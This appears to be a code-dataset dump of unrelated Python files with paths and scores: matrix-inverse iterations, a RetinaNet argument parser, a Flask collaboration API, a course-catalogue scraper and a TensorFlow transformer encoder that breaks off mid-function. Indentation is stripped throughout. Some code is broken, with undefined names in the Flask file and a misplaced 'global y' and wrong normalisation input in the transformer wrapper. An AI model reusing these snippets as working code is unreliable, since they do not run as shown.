for i in range(len(X)):
X[i, i] = nr + X[i, i]
return X
def identity_plus(A, nr):
for i in range(len(A)):
A[i, i] = A[i, i] + nr
return A
def get_solution_norm(A):
max_sum_line = 0
for i in range(0, len(A)):
current_sum = 0
for j in range(0, len(A)):
current_sum += abs(A[i][j])
if current_sum > max_sum_line:
max_sum_line = current_sum
return max_sum_line
def get_next_schultz(A, V):
return np.matmul(V, identity_minus(np.matmul(A, V), 2))
def get_next_li1(A, V):
AV = np.matmul(A, V)
aux = np.matmul(AV, identity_minus(AV, 3))
return np.matmul(V, identity_minus(aux, 3))
def get_next_li2(A, V):
identity = np.identity(len(A))
VA = np.matmul(V, A)
aux1 = (1/4) * identity_minus(VA, 1)
VA_identity = identity_minus(VA, 3)
aux2 = np.matmul(VA_identity, VA_identity)
return np.matmul(identity_plus(np.matmul(aux1, aux2), 1), V)
def get_initial_matrix(A):
transposed = np.transpose(A)
max_sum_column = np.abs(A).sum(axis=0).max()
max_sum_line = np.abs(A).sum(axis=1).max()
return transposed / (max_sum_line * max_sum_column)
def generate_matrix(n):
matrix = np.identity(n)
for i in range(0, n-1):
matrix[i, i+1] = 4
return matrix
def solve(alg):
A = generate_matrix(10)
#A = np.random.rand(500, 500) * 1000
V_prev = V_next = get_initial_matrix(A)
k = 0
norm = 10e9
while 10e10 >= norm >= epsilon and k < kmax:
if alg == 1:
V_next = get_next_schultz(A, V_prev)
elif alg == 2:
V_next = get_next_li1(A, V_prev)
elif alg == 3:
V_next = get_next_li2(A, V_prev)
norm = np.linalg.norm(V_next - V_prev)
k += 1
V_prev = V_next
print("\titerations = ", k)
if norm < epsilon:
print("\tconvergence")
result_norm = get_solution_norm(np.matmul(A, V_next) - np.identity(len(A)))
print("\tnorm = ", result_norm)
else:
print("\tdivergence\n")
if __name__ == '__main__':
print("Schlutz: ")
solve(1)
print("Li 1: ")
solve(2)
print("Li 2: ")
solve(3) | hw5/main.py | import numpy as np
epsilon = 10e-10
kmax = 10000
def identity_minus(A, nr):
X = A * -1
for i in range(len(X)):
X[i, i] = nr + X[i, i]
return X
def identity_plus(A, nr):
for i in range(len(A)):
A[i, i] = A[i, i] + nr
return A
def get_solution_norm(A):
max_sum_line = 0
for i in range(0, len(A)):
current_sum = 0
for j in range(0, len(A)):
current_sum += abs(A[i][j])
if current_sum > max_sum_line:
max_sum_line = current_sum
return max_sum_line
def get_next_schultz(A, V):
return np.matmul(V, identity_minus(np.matmul(A, V), 2))
def get_next_li1(A, V):
AV = np.matmul(A, V)
aux = np.matmul(AV, identity_minus(AV, 3))
return np.matmul(V, identity_minus(aux, 3))
def get_next_li2(A, V):
identity = np.identity(len(A))
VA = np.matmul(V, A)
aux1 = (1/4) * identity_minus(VA, 1)
VA_identity = identity_minus(VA, 3)
aux2 = np.matmul(VA_identity, VA_identity)
return np.matmul(identity_plus(np.matmul(aux1, aux2), 1), V)
def get_initial_matrix(A):
transposed = np.transpose(A)
max_sum_column = np.abs(A).sum(axis=0).max()
max_sum_line = np.abs(A).sum(axis=1).max()
return transposed / (max_sum_line * max_sum_column)
def generate_matrix(n):
matrix = np.identity(n)
for i in range(0, n-1):
matrix[i, i+1] = 4
return matrix
def solve(alg):
A = generate_matrix(10)
#A = np.random.rand(500, 500) * 1000
V_prev = V_next = get_initial_matrix(A)
k = 0
norm = 10e9
while 10e10 >= norm >= epsilon and k < kmax:
if alg == 1:
V_next = get_next_schultz(A, V_prev)
elif alg == 2:
V_next = get_next_li1(A, V_prev)
elif alg == 3:
V_next = get_next_li2(A, V_prev)
norm = np.linalg.norm(V_next - V_prev)
k += 1
V_prev = V_next
print("\titerations = ", k)
if norm < epsilon:
print("\tconvergence")
result_norm = get_solution_norm(np.matmul(A, V_next) - np.identity(len(A)))
print("\tnorm = ", result_norm)
else:
print("\tdivergence\n")
if __name__ == '__main__':
print("Schlutz: ")
solve(1)
print("Li 1: ")
solve(2)
print("Li 2: ")
solve(3) | 0.285671 | 0.411702 |
import argparse
def parse_args(args):
""" Parse the arguments.
"""
parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')
subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type')
subparsers.required = True
coco_parser = subparsers.add_parser('coco')
coco_parser.add_argument('coco_path', help='Path to dataset directory (ie. /tmp/COCO).')
pascal_parser = subparsers.add_parser('pascal')
pascal_parser.add_argument('pascal_path', help='Path to dataset directory (ie. /tmp/VOCdevkit).')
kitti_parser = subparsers.add_parser('kitti')
kitti_parser.add_argument('kitti_path', help='Path to dataset directory (ie. /tmp/kitti).')
def csv_list(string):
return string.split(',')
oid_parser = subparsers.add_parser('oid')
oid_parser.add_argument('main_dir', help='Path to dataset directory.')
oid_parser.add_argument('--version', help='The current dataset version is v4.', default='v4')
oid_parser.add_argument('--labels-filter', help='A list of labels to filter.', type=csv_list, default=None)
oid_parser.add_argument('--annotation-cache-dir', help='Path to store annotation cache.', default='.')
oid_parser.add_argument('--parent-label', help='Use the hierarchy children of this label.', default=None)
csv_parser = subparsers.add_parser('csv')
csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for training.')
csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.')
csv_parser.add_argument('--val-annotations', help='Path to CSV file containing annotations for validation (optional).')
group = parser.add_mutually_exclusive_group()
group.add_argument('--snapshot', help='Resume training from a snapshot.')
group.add_argument('--imagenet-weights', help='Initialize the model with pretrained imagenet weights. This is the default behaviour.', action='store_const', const=True, default=True)
group.add_argument('--weights', help='Initialize the model with weights from a file.')
group.add_argument('--no-weights', help='Don\'t initialize the model with any weights.', dest='imagenet_weights', action='store_const', const=False)
parser.add_argument('--backbone', help='Backbone model used by retinanet.', default='resnet50', type=str)
parser.add_argument('--batch-size', help='Size of the batches.', default=1, type=int)
parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).')
parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0)
parser.add_argument('--multi-gpu-force', help='Extra flag needed to enable (experimental) multi-gpu support.', action='store_true')
parser.add_argument('--epochs', help='Number of epochs to train.', type=int, default=50)
parser.add_argument('--steps', help='Number of steps per epoch.', type=int, default=10000)
parser.add_argument('--lr', help='Learning rate.', type=float, default=1e-5)
parser.add_argument('--snapshot-path', help='Path to store snapshots of models during training (defaults to \'./snapshots\')', default='./snapshots')
parser.add_argument('--tensorboard-dir', help='Log directory for Tensorboard output', default='./logs')
parser.add_argument('--no-snapshots', help='Disable saving snapshots.', dest='snapshots', action='store_false')
parser.add_argument('--no-evaluation', help='Disable per epoch evaluation.', dest='evaluation', action='store_false')
parser.add_argument('--freeze-backbone', help='Freeze training of backbone layers.', action='store_true')
parser.add_argument('--random-transform', help='Randomly transform image and annotations.', action='store_true')
parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=800)
parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=1333)
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true')
parser.add_argument('--compute-val-loss', help='Compute validation loss during training', dest='compute_val_loss', action='store_true')
# Fit generator arguments
parser.add_argument('--multiprocessing', help='Use multiprocessing in fit_generator.', action='store_true')
parser.add_argument('--workers', help='Number of generator workers.', type=int, default=1)
parser.add_argument('--max-queue-size', help='Queue length for multiprocessing workers in fit_generator.', type=int, default=10)
return parser.parse_args(args) | yolk/parser.py | import argparse
def parse_args(args):
""" Parse the arguments.
"""
parser = argparse.ArgumentParser(description='Simple training script for training a RetinaNet network.')
subparsers = parser.add_subparsers(help='Arguments for specific dataset types.', dest='dataset_type')
subparsers.required = True
coco_parser = subparsers.add_parser('coco')
coco_parser.add_argument('coco_path', help='Path to dataset directory (ie. /tmp/COCO).')
pascal_parser = subparsers.add_parser('pascal')
pascal_parser.add_argument('pascal_path', help='Path to dataset directory (ie. /tmp/VOCdevkit).')
kitti_parser = subparsers.add_parser('kitti')
kitti_parser.add_argument('kitti_path', help='Path to dataset directory (ie. /tmp/kitti).')
def csv_list(string):
return string.split(',')
oid_parser = subparsers.add_parser('oid')
oid_parser.add_argument('main_dir', help='Path to dataset directory.')
oid_parser.add_argument('--version', help='The current dataset version is v4.', default='v4')
oid_parser.add_argument('--labels-filter', help='A list of labels to filter.', type=csv_list, default=None)
oid_parser.add_argument('--annotation-cache-dir', help='Path to store annotation cache.', default='.')
oid_parser.add_argument('--parent-label', help='Use the hierarchy children of this label.', default=None)
csv_parser = subparsers.add_parser('csv')
csv_parser.add_argument('annotations', help='Path to CSV file containing annotations for training.')
csv_parser.add_argument('classes', help='Path to a CSV file containing class label mapping.')
csv_parser.add_argument('--val-annotations', help='Path to CSV file containing annotations for validation (optional).')
group = parser.add_mutually_exclusive_group()
group.add_argument('--snapshot', help='Resume training from a snapshot.')
group.add_argument('--imagenet-weights', help='Initialize the model with pretrained imagenet weights. This is the default behaviour.', action='store_const', const=True, default=True)
group.add_argument('--weights', help='Initialize the model with weights from a file.')
group.add_argument('--no-weights', help='Don\'t initialize the model with any weights.', dest='imagenet_weights', action='store_const', const=False)
parser.add_argument('--backbone', help='Backbone model used by retinanet.', default='resnet50', type=str)
parser.add_argument('--batch-size', help='Size of the batches.', default=1, type=int)
parser.add_argument('--gpu', help='Id of the GPU to use (as reported by nvidia-smi).')
parser.add_argument('--multi-gpu', help='Number of GPUs to use for parallel processing.', type=int, default=0)
parser.add_argument('--multi-gpu-force', help='Extra flag needed to enable (experimental) multi-gpu support.', action='store_true')
parser.add_argument('--epochs', help='Number of epochs to train.', type=int, default=50)
parser.add_argument('--steps', help='Number of steps per epoch.', type=int, default=10000)
parser.add_argument('--lr', help='Learning rate.', type=float, default=1e-5)
parser.add_argument('--snapshot-path', help='Path to store snapshots of models during training (defaults to \'./snapshots\')', default='./snapshots')
parser.add_argument('--tensorboard-dir', help='Log directory for Tensorboard output', default='./logs')
parser.add_argument('--no-snapshots', help='Disable saving snapshots.', dest='snapshots', action='store_false')
parser.add_argument('--no-evaluation', help='Disable per epoch evaluation.', dest='evaluation', action='store_false')
parser.add_argument('--freeze-backbone', help='Freeze training of backbone layers.', action='store_true')
parser.add_argument('--random-transform', help='Randomly transform image and annotations.', action='store_true')
parser.add_argument('--image-min-side', help='Rescale the image so the smallest side is min_side.', type=int, default=800)
parser.add_argument('--image-max-side', help='Rescale the image if the largest side is larger than max_side.', type=int, default=1333)
parser.add_argument('--config', help='Path to a configuration parameters .ini file.')
parser.add_argument('--weighted-average', help='Compute the mAP using the weighted average of precisions among classes.', action='store_true')
parser.add_argument('--compute-val-loss', help='Compute validation loss during training', dest='compute_val_loss', action='store_true')
# Fit generator arguments
parser.add_argument('--multiprocessing', help='Use multiprocessing in fit_generator.', action='store_true')
parser.add_argument('--workers', help='Number of generator workers.', type=int, default=1)
parser.add_argument('--max-queue-size', help='Queue length for multiprocessing workers in fit_generator.', type=int, default=10)
return parser.parse_args(args) | 0.630912 | 0.239505 |
from flask import request
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_restful import Resource
from ...models import Collaboration
from ...schemas import CollaborationSchema
from .responses import respond
class CollaborationListResource(Resource):
@jwt_required
def get(self):
schema = CollaborationSchema(many=True, only=Fields.Collaboration.compact)
try:
growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['Growthbook does not exist', str(e)])
collaborations = growthbook.collaborations
if get_jwt_identity() not in growthbook.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
return respond(200, {'collaborations': schema.dump(collaborations).data})
@jwt_required
def post(self):
schema = CollaborationSchema()
collaboration = Collaboration(**schema.load(request.args).data)
collaboration.inviter = User.objects.get(username=get_jwt_identity())
try:
collaboration.invited = User.objects.get(username=request.args['username'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['User does not exist', str(e)])
try:
growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['Growthbook does not exist', str(e)])
if get_jwt_identity() not in growthbook.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
try:
growthbook.collaborations.append(collaboration)
growthbook.save()
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(201, {'collaboration': schema.dump(collaboration).data})
class CollaborationResource(Resource):
@jwt_required
def get(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() in collaboration._instance.collaborating_identities():
schema = CollaborationSchema()
else:
return respond(403, {}, ['Access forbidden'])
return respond(200, {'collaboration': schema.dump(collaboration).data})
@jwt_required
def put(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() in collaboration._instance.collaborating_identities():
schema = CollaborationSchema()
else:
return respond(403, {}, ['Access forbidden'])
try:
collaboration.update(**schema.dump(collaboration).data)
# Return updated document
collaboration = Collaboration.objects.get(id=id)
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(200, {'collaboration': schema.dump(collaboration).data})
@jwt_required
def delete(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() not in collaboration._instance.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
collaboration.delete()
return respond(204) | api/resources/v1/collaborations.py | from flask import request
from flask_jwt_extended import get_jwt_identity, jwt_required
from flask_restful import Resource
from ...models import Collaboration
from ...schemas import CollaborationSchema
from .responses import respond
class CollaborationListResource(Resource):
@jwt_required
def get(self):
schema = CollaborationSchema(many=True, only=Fields.Collaboration.compact)
try:
growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['Growthbook does not exist', str(e)])
collaborations = growthbook.collaborations
if get_jwt_identity() not in growthbook.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
return respond(200, {'collaborations': schema.dump(collaborations).data})
@jwt_required
def post(self):
schema = CollaborationSchema()
collaboration = Collaboration(**schema.load(request.args).data)
collaboration.inviter = User.objects.get(username=get_jwt_identity())
try:
collaboration.invited = User.objects.get(username=request.args['username'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['User does not exist', str(e)])
try:
growthbook = Growthbook.objects.get(id=request.args['growthbook_id'])
except (DoesNotExist, ValidationError) as e:
return respond(404, {}, ['Growthbook does not exist', str(e)])
if get_jwt_identity() not in growthbook.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
try:
growthbook.collaborations.append(collaboration)
growthbook.save()
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(201, {'collaboration': schema.dump(collaboration).data})
class CollaborationResource(Resource):
@jwt_required
def get(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() in collaboration._instance.collaborating_identities():
schema = CollaborationSchema()
else:
return respond(403, {}, ['Access forbidden'])
return respond(200, {'collaboration': schema.dump(collaboration).data})
@jwt_required
def put(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() in collaboration._instance.collaborating_identities():
schema = CollaborationSchema()
else:
return respond(403, {}, ['Access forbidden'])
try:
collaboration.update(**schema.dump(collaboration).data)
# Return updated document
collaboration = Collaboration.objects.get(id=id)
except (NotUniqueError, ValidationError) as e:
return respond(400, {}, ['Validation error', str(e)])
return respond(200, {'collaboration': schema.dump(collaboration).data})
@jwt_required
def delete(self, id):
try:
collaboration = Collaboration.objects.get(id=id)
except (DoesNotExist, ValidationError):
return respond(404, {}, ['Collaboration does not exist'])
if get_jwt_identity() not in collaboration._instance.collaborating_identities():
return respond(403, {}, ['Access forbidden'])
collaboration.delete()
return respond(204) | 0.50708 | 0.159839 |
import os
import argparse
import xmltodict
import json
import requests
from concurrent.futures import ThreadPoolExecutor
MAX_WORKERS = 10
ENDPOINT = 'https://explorecourses.stanford.edu/'
DEPARMENTS_ENDPOINT = ENDPOINT + '?view=xml-20140630'
COURSE_ENDPOINT = (ENDPOINT + 'search?view=xml-20140630&academicYear='
'&q={name}&filter-departmentcode-{name}=on'
'&filter-coursestatus-Active=on')
def fetch_departments():
r = requests.get(DEPARMENTS_ENDPOINT)
body = xmltodict.parse(r.text, force_list=('school', 'department'))
result = []
for school in body['schools']['school']:
school_name = school['@name']
for department in school['department']:
result.append({
'name': department['@name'],
'longname': department['@longname'],
'school': school_name
})
return result
def fetch_department_courses(name):
r = requests.get(COURSE_ENDPOINT.format(name=name))
return r.content
def process_department(name, destination):
print(' Processing department', name)
raw = fetch_department_courses(name)
with open(destination, 'wb+') as f:
f.write(raw)
print(' Finished processing department', name)
def main():
parser = argparse.ArgumentParser(description='fast-courses fetch')
parser.add_argument('--department', '-d', type=str)
parser.add_argument('--inputdepartments', '-i',
type=argparse.FileType('r'))
parser.add_argument('--outdir', '-o', type=str, required=True)
args = parser.parse_args()
print('Fetching ExploreCourses course data...')
os.makedirs(args.outdir, exist_ok=True)
if args.department:
department_names = [args.department]
else:
if args.inputdepartments:
print(' Using input departments', args.inputdepartments.name)
department_data = json.load(args.inputdepartments)
else:
print(' Fetching fresh list of departments')
department_data = fetch_departments()
dest = os.path.join(args.outdir, 'departments.json')
with open(dest, 'w+') as f:
json.dump(department_data, f, indent=4)
print(' Finished fetching fresh list of departments!')
department_names = [d['name'] for d in department_data]
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
for name in department_names:
dest = os.path.join(args.outdir, name + '.xml')
executor.submit(process_department, name, dest)
print('Finished fetching ExploreCourses course data!')
if __name__ == '__main__':
main() | scraper/fetch.py | import os
import argparse
import xmltodict
import json
import requests
from concurrent.futures import ThreadPoolExecutor
MAX_WORKERS = 10
ENDPOINT = 'https://explorecourses.stanford.edu/'
DEPARMENTS_ENDPOINT = ENDPOINT + '?view=xml-20140630'
COURSE_ENDPOINT = (ENDPOINT + 'search?view=xml-20140630&academicYear='
'&q={name}&filter-departmentcode-{name}=on'
'&filter-coursestatus-Active=on')
def fetch_departments():
r = requests.get(DEPARMENTS_ENDPOINT)
body = xmltodict.parse(r.text, force_list=('school', 'department'))
result = []
for school in body['schools']['school']:
school_name = school['@name']
for department in school['department']:
result.append({
'name': department['@name'],
'longname': department['@longname'],
'school': school_name
})
return result
def fetch_department_courses(name):
r = requests.get(COURSE_ENDPOINT.format(name=name))
return r.content
def process_department(name, destination):
print(' Processing department', name)
raw = fetch_department_courses(name)
with open(destination, 'wb+') as f:
f.write(raw)
print(' Finished processing department', name)
def main():
parser = argparse.ArgumentParser(description='fast-courses fetch')
parser.add_argument('--department', '-d', type=str)
parser.add_argument('--inputdepartments', '-i',
type=argparse.FileType('r'))
parser.add_argument('--outdir', '-o', type=str, required=True)
args = parser.parse_args()
print('Fetching ExploreCourses course data...')
os.makedirs(args.outdir, exist_ok=True)
if args.department:
department_names = [args.department]
else:
if args.inputdepartments:
print(' Using input departments', args.inputdepartments.name)
department_data = json.load(args.inputdepartments)
else:
print(' Fetching fresh list of departments')
department_data = fetch_departments()
dest = os.path.join(args.outdir, 'departments.json')
with open(dest, 'w+') as f:
json.dump(department_data, f, indent=4)
print(' Finished fetching fresh list of departments!')
department_names = [d['name'] for d in department_data]
with ThreadPoolExecutor(max_workers=MAX_WORKERS) as executor:
for name in department_names:
dest = os.path.join(args.outdir, name + '.xml')
executor.submit(process_department, name, dest)
print('Finished fetching ExploreCourses course data!')
if __name__ == '__main__':
main() | 0.263126 | 0.082438 |
import tensorflow as tf
from official.transformer.model import attention_layer, ffn_layer, transformer, model_utils, model_params
from tensor2tensor.models.research import universal_transformer, universal_transformer_util
from tensor2tensor.models import transformer as t2t_transformer
def create(params, transformer_params, mode):
transformer_params.use_convolution = params.use_convolution
constructor = {'transformer': lambda: Transformer(transformer_params, mode == tf.estimator.ModeKeys.TRAIN),
'universal': lambda: UniversalTransformer(transformer_params, mode == tf.estimator.ModeKeys.TRAIN),
'adaptive': lambda: AdaptiveUniversalTransformer(transformer_params, mode)}
return constructor[params.transformer_type]()
def sentence_transformer_params(params):
if params.transformer_type == 'adaptive':
hparams = universal_transformer.adaptive_universal_transformer_base()
hparams.batch_size = params.batch_size
hparams.recurrence_type = 'act'
hparams.act_type = 'basic'
hparams.max_length = params.toks_per_sent
hparams.num_hidden_layers = params.sentence_transformer_num_stacks
hparams.add_hparam("vocab_size", params.vocab_size)
hparams.hidden_size = params.embedding_size
hparams.num_heads = params.sentence_transformer_num_heads
hparams.add_hparam("embedding_device", params.embedding_device)
return hparams
tparams = model_params.TransformerBaseParams()
tparams.batch_size = params.batch_size
tparams.max_length = params.toks_per_sent
tparams.vocab_size = params.vocab_size
tparams.hidden_size = params.embedding_size
tparams.num_heads = params.sentence_transformer_num_heads
tparams.num_hidden_layers = params.sentence_transformer_num_stacks
return tparams
def base_transformer_params(params):
if params.transformer_type == 'adaptive':
hparams = universal_transformer.adaptive_universal_transformer_base()
hparams.batch_size = params.batch_size
hparams.recurrence_type = 'act'
hparams.act_type = 'basic'
hparams.max_length = params.max_doc_len
hparams.num_hidden_layers = params.base_transformer_num_stacks
hparams.add_hparam("vocab_size", params.vocab_size)
hparams.hidden_size = params.embedding_size
hparams.num_heads = params.base_transformer_num_heads
hparams.add_hparam("embedding_device", params.embedding_device)
return hparams
tparams = model_params.TransformerBaseParams()
tparams.batch_size = params.batch_size
tparams.max_length = params.max_doc_len
tparams.vocab_size = params.vocab_size
tparams.hidden_size = params.embedding_size
tparams.num_heads = params.base_transformer_num_heads
tparams.num_hidden_layers = params.base_transformer_num_stacks
return tparams
class Transformer(transformer.Transformer):
def encode_no_lookup(self, embedded_inputs, inputs_mask):
"""Encoder step for transformer given already-embedded inputs
Args:
model: transformer model
embedded_inputs: int tensor with shape [batch_size, input_length, emb_size].
inputs_mask: int tensor with shape [batch_size, input_length]
params: transformer_params
train: boolean flag
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
with tf.name_scope("encode"):
# Prepare inputs to the layer stack by adding positional encodings and
# applying dropout.
inputs_padding = model_utils.get_padding(inputs_mask)
attention_bias = model_utils.get_padding_bias(inputs_mask)
with tf.name_scope("add_pos_encoding"):
length = tf.shape(embedded_inputs)[1]
pos_encoding = model_utils.get_position_encoding(
length, self.params.hidden_size)
encoder_inputs = embedded_inputs + pos_encoding
if self.train:
encoder_inputs = tf.nn.dropout(
encoder_inputs, 1 - self.params.layer_postprocess_dropout)
return self.encoder_stack(encoder_inputs, attention_bias, inputs_padding)
class UniversalTransformer(Transformer):
def __init__(self, params, train):
super(UniversalTransformer, self).__init__(params, train)
self.encoder_stack = EncoderStackUniv(params, train)
class AdaptiveUniversalTransformer:
def __init__(self, params, mode):
params.filter_size = 512
self.hparams = params
self.target_space = 0
self.model = universal_transformer.UniversalTransformerEncoder(params, mode)
self.embedding_device = params.embedding_device
with tf.device(self.embedding_device):
self.word_embeddings = tf.get_variable("word_embeddings", shape=[params.vocab_size, params.hidden_size])
def encode(self, inputs, input_mask=None, _target_space=None, _hparams=None, _features=None, _losses=None):
"""Encode transformer inputs.
Args:
inputs: Transformer inputs [batch_size, input_length] int64 tensor.
input_mask: [batch_size, input_length, hidden_size] mask
_target_space: scalar, target space ID.
_hparams: hyperparmeters for model.
_features: optionally pass the entire features dictionary as well.
This is needed now for "packed" datasets.
_losses: Unused.
Returns:
Tuple of:
encoder_output: Encoder representation.
[batch_size, input_length, hidden_dim]
encoder_extra_output: which is extra encoder output used in some
variants of the model (e.g. in ACT, to pass the ponder-time to body)
"""
# [batch_size, input_length]
nonpadding = tf.to_float(tf.not_equal(inputs, 0))
with tf.device(self.embedding_device):
# [batch_size, input_length, hidden_dim]
inputs = tf.nn.embedding_lookup(self.word_embeddings, inputs)
if input_mask is not None:
inputs += input_mask
return self.encode_no_lookup(inputs, nonpadding)
def encode_no_lookup(self, embedded_inputs, inputs_mask):
"""Encoder step for transformer given already-embedded inputs
Args:
embedded_inputs: int tensor with shape [batch_size, input_length, emb_size].
inputs_mask: tensor with shape [batch_size, input_length]
Returns:
float tensor with shape [batch_size, input_length, hidden_size]
"""
(encoder_input, self_attention_bias, _) = (
t2t_transformer.transformer_prepare_encoder(embedded_inputs, self.target_space, self.hparams))
encoder_input = tf.nn.dropout(encoder_input,
1.0 - self.hparams.layer_prepostprocess_dropout)
(encoder_output, encoder_extra_output) = (
universal_transformer_util.universal_transformer_encoder(
encoder_input,
self_attention_bias,
self.hparams,
nonpadding=inputs_mask,
save_weights_to=self.model.attention_weights))
return encoder_output, encoder_extra_output
class EncoderStack(tf.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params, train):
super(EncoderStack, self).__init__()
self.layers = []
for _ in range(params.num_hidden_layers):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params.hidden_size, params.num_heads, params.attention_dropout, train)
feed_forward_network = ConvolutionalFeedForwardNetwork(
params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
self.layers.append([
transformer.PrePostProcessingWrapper(self_attention_layer, params, train),
transformer.PrePostProcessingWrapper(feed_forward_network, params, train)])
# Create final layer normalization layer.
self.output_normalization = transformer.LayerNormalization(params.hidden_size)
# noinspection PyAbstractClass
class EncoderStackUniv(tf.layers.Layer):
"""Transformer encoder stack.
The encoder stack is made up of N identical layers. Each layer is composed
of the sublayers:
1. Self-attention layer
2. Feedforward network (which is 2 fully-connected layers)
"""
def __init__(self, params, train):
super(EncoderStackUniv, self).__init__()
self.layers = []
for _ in range(params.num_hidden_layers):
# Create sublayers for each layer.
self_attention_layer = attention_layer.SelfAttention(
params.hidden_size, params.num_heads, params.attention_dropout, train)
feed_forward_network = ConvolutionalFeedForwardNetwork(
params.hidden_size, params.filter_size, params.relu_dropout, train) if params.use_convolution else \
ffn_layer.FeedFowardNetwork(params.hidden_size, params.filter_size, params.relu_dropout, train)
self.layers.append([
PrePostProcessingWrapper(self_attention_layer, params, train),
PrePostProcessingWrapper(feed_forward_network, params, train)])
# Create final layer normalization layer.
self.output_normalization = transformer.LayerNormalization(params.hidden_size)
# noinspection PyMethodOverriding
def call(self, encoder_inputs, attention_bias, inputs_padding):
"""Return the output of the encoder layer stacks.
Args:
encoder_inputs: tensor with shape [batch_size, input_length, hidden_size]
attention_bias: bias for the encoder self-attention layer.
[batch_size, 1, 1, input_length]
inputs_padding: P
Returns:
Output of encoder layer stack.
float32 tensor with shape [batch_size, input_length, hidden_size]
"""
for n, layer in enumerate(self.layers):
# Run inputs through the sublayers.
self_attention_layer = layer[0]
feed_forward_network = layer[1]
with tf.variable_scope("encoder_stack_univ", reuse=tf.AUTO_REUSE):
with tf.variable_scope("self_attention"):
encoder_inputs = self_attention_layer(encoder_inputs, attention_bias)
with tf.variable_scope("ffn"):
encoder_inputs = feed_forward_network(encoder_inputs, inputs_padding)
return self.output_normalization(encoder_inputs)
class PrePostProcessingWrapper(object):
"""Wrapper class that applies layer pre-processing and post-processing.
Applies the passed layer, a residual connection, dropout, then layer normalization.
"""
def __init__(self, layer, params, train):
self.layer = layer
self.postprocess_dropout = params.layer_postprocess_dropout
self.train = train
# Create normalization layer
self.layer_norm = transformer.LayerNormalization(params.hidden_size)
def __call__(self, x, *args, **kwargs):
# Get layer output
y = self.layer(x, *args, **kwargs)
# residual connection
y = y + x
# Postprocessing: apply dropout and residual connection
if self.train:
global y
y = tf.nn.dropout(y, 1 - self.postprocess_dropout)
# Preprocessing: apply layer normalization
y = self.layer_norm(x)
return y
class ConvolutionalFeedForwardNetwork(tf.layers.Layer):
"""Fully connected feedforward network."""
def __init__(self, hidden_size, filter_size, relu_dropout, train):
super(ConvolutionalFeedForwardNetwork, self).__init__()
self.hidden_size = hidden_size
self.filter_size = filter_size
self.relu_dropout = relu_dropout
self.train = train
self.filter_dense_layer = tf.layers.Dense(
filter_size, use_bias=True, activation=tf.nn.relu, name="filter_layer")
self.convolutional_layer = tf.layers.Conv1D(
filters=filter_size, kernel_size=5, use_bias=True, activation=tf.nn.relu, name='conv_layer')
self.output_dense_layer = tf.layers.Dense(
hidden_size, use_bias=True, name="output_layer")
def call(self, x, padding=None):
"""Return outputs of the feedforward network.
Args:
x: tensor with shape [batch_size, length, hidden_size]
padding: (optional) If set, the padding values are temporarily removed
from x. The padding values are placed back in the output tensor in the
same locations. shape [batch_size, length]
Returns:
Output of the feedforward network.
tensor with shape [batch_size, length, hidden_size]
"""
# Retrieve dynamically known shapes
batch_size = tf.shape(x)[0]
length = tf.shape(x)[1]
if padding is not None:
with tf.name_scope("remove_padding"):
# Flatten padding to [batch_size*length]
pad_mask = tf.reshape(padding, [-1])
nonpad_ids = tf.to_int32(tf.where(pad_mask < 1e-9))
# Reshape x to [batch_size*length, hidden_size] to remove padding
x = tf.reshape(x, [-1, self.hidden_size])
x = tf.gather_nd(x, indices=nonpad_ids)
# Reshape x from 2 dimensions to 3 dimensions.
x.set_shape([None, self.hidden_size])
x = tf.expand_dims(x, axis=0)
output = self.filter_dense_layer(x)
if self.train:
output = tf.nn.dropout(output, 1.0 - self.relu_dropout)
output = self.convolutional_layer(output)
output = self.output_dense_layer(output)
if padding is not None:
